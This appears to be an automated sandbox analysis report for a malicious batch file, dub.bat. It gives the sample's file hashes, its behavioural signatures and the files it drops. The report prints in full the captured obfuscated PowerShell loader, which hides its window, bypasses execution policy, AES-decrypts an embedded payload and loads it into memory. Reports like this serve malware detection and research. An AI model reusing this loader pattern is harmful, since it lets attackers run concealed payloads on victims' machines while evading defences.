Analysis
- max time kernel: 42s
- max time network: 45s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 08-02-2023 03:50
Static task: static1
Behavioral task: behavioral1
- Sample: dub.bat
- Resource: win7-20220812-en
Behavioral task: behavioral2
- Sample: dub.bat
- Resource: win10-20220901-en
General
- Target: dub.bat
- Size: 226KB
- MD5: cf81b345541f19ab200b4d0de4a64962
- SHA1: 56dcdd340cb470fcd42c0cd1531d1eac8fcd7980
- SHA256: 07a0759d5b376fc57f2ad9c5a32d59829934828b862591225c43421044ffd4ec
- SHA512: ac960f497fc3354831a76c1a385e95c65b66d862bd09e24b73bedb8e969d8221516e8d7a6eba257c5613c61d82d16305fd672a5112d441b97e5fefa0d88a7e97
- SSDEEP: 6144:LiEz3MvivRRFAFNmR3QaqnMadPo7lNhkLPUoV:mivRRFsNmwulNeLcoV
Malware Config
Signatures
- Executes dropped EXE (1 IoCs)
  Processes: dub.bat.exe (pid 1432)
- Loads dropped DLL (1 IoCs)
  Processes: cmd.exe (pid 1660)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes: dub.bat.exe (pid 1432)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: dub.bat.exe (pid 1432), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: PID 1660 cmd.exe wrote to memory of PID 1432 dub.bat.exe (reported 3 times)
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\dub.bat"
  Signatures:
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - Child process: C:\Users\Admin\AppData\Local\Temp\dub.bat.exe
    Command line: "dub.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utCHT = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\dub.bat').Split([Environment]::NewLine);foreach ($sWAOq in $utCHT) { if ($sWAOq.StartsWith(':: ')) { $upQKs = $sWAOq.Substring(3); break; }; };$JjLmi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($upQKs);$YkqlI = New-Object System.Security.Cryptography.AesManaged;$YkqlI.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YkqlI.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YkqlI.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kiFQHKEXvznY0Nsnm3fp94kgb604e6Feq9TQN777Yxs=');$YkqlI.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5Ca2LFqXHi3HVlKnNoz3+g==');$vFmBU = $YkqlI.CreateDecryptor();$JjLmi = $vFmBU.TransformFinalBlock($JjLmi, 0, $JjLmi.Length);$vFmBU.Dispose();$YkqlI.Dispose();$fuUUI = New-Object System.IO.MemoryStream(, $JjLmi);$gvEAD = New-Object System.IO.MemoryStream;$wMQDT = New-Object System.IO.Compression.GZipStream($fuUUI, [IO.Compression.CompressionMode]::Decompress);$wMQDT.CopyTo($gvEAD);$wMQDT.Dispose();$fuUUI.Dispose();$gvEAD.Dispose();$JjLmi = $gvEAD.ToArray();$vodVl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($JjLmi);$UBeHH = $vodVl.EntryPoint;$UBeHH.Invoke($null, (, [string[]] ('')))
    Signatures:
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\dub.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- \Users\Admin\AppData\Local\Temp\dub.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- memory/1432-55-0x0000000000000000-mapping.dmp
- memory/1432-57-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmp
  Filesize: 8KB
- memory/1432-58-0x000007FEF42B0000-0x000007FEF4CD3000-memory.dmp
  Filesize: 10.1MB
- memory/1432-60-0x0000000002534000-0x0000000002537000-memory.dmp
  Filesize: 12KB
- memory/1432-59-0x000007FEF3750000-0x000007FEF42AD000-memory.dmp
  Filesize: 11.4MB
- memory/1432-61-0x0000000002534000-0x0000000002537000-memory.dmp
  Filesize: 12KB
- memory/1432-62-0x000000000253B000-0x000000000255A000-memory.dmp
  Filesize: 124KB